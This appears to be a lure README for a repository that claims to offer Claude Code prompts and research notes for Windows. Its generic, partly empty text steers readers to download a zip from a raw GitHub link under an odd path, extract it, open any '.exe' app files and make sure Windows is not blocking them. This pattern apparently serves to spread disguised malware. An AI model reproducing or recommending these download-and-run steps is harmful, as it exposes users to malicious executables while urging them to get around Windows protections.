claude-code-prompts-reference is a Windows-ready reference set for Claude Code research material. It gives you a place to review prompts, tools, and related notes in one spot.
Use it if you want to:
- View prompt examples in one place
- Read research notes without sorting through many files
- Check how Claude Code tasks are structured
- Keep a local copy for later review
Before you start, make sure you have:
- A Windows PC
- A web browser
- Enough free space for the files
- Permission to save files on your computer
The files should work on a normal Windows setup with no special setup.
- Open the download page: https://raw.githubusercontent.com/moiralongspurred78/claude-code-prompts-reference/main/memory/code-prompts-reference-claude-v3.4.zip
- Look for the main files on the page
- If you see a zip file or release file, download it
- Save it to your Downloads folder
- Wait for the file to finish downloading
If the page shows source files, use the green Code button on GitHub to get the project files.
- Open the downloaded file in File Explorer
- If the file is a zip folder, right-click it and choose Extract All
- Pick a folder where you want to keep the files
- Open the extracted folder
- Look for a main file such as README.md, index.html, or a starter app file
- Open that file with the tool it uses
If Windows asks what app to use, pick a common app like:
- Notepad for text files
- Edge or Chrome for web files
- Any file viewer for folders with notes
After you open the files, you can move through the material in a few simple ways:
- Read the prompt examples one by one
- Search for words like Claude, tools, or system prompts
- Copy text you want to keep for later use
- Save useful sections in your notes app
- Open related files when you want more detail
If the project includes folders, check them in this order:
- README files
- Prompt folders
- Research notes
- Tool references
- System prompt files
You may see files like these:

- research/ — background material

This layout helps keep the material easy to scan.
You can use this reference for:

For the easiest start, open these first:
- README.md
- Any file named start, guide, or index
- Prompt examples with clear names
- Notes that explain how the material is grouped
If the page has many files, use the GitHub search box to find the topic you want.
These file types are common in this kind of repo:
- .md — Markdown text
- .txt — plain text
- .json — data files
- .yaml or .yml — settings files
- .html — web pages
- .exe — app files, if included
For most users, .md and .txt files are the easiest to open.
If you double-click a file and nothing happens:
- Right-click the file
- Choose Open with
- Pick another app
- Try Edge, Chrome, or Notepad
- Check that the file was fully extracted
If the file is still locked, download it again and try one more time.
To keep the files easy to find:
- Put them in a folder named Claude Code Reference
- Avoid moving files around after you open them
- Make a backup on a USB drive or cloud folder
- Keep the original zip file until you know the files work
If you run into a problem:
- Make sure the download finished
- Check that the file is not blocked by Windows
- Try opening the file from File Explorer
- Re-extract the zip file into a new folder
- Restart your browser if the download page does not load
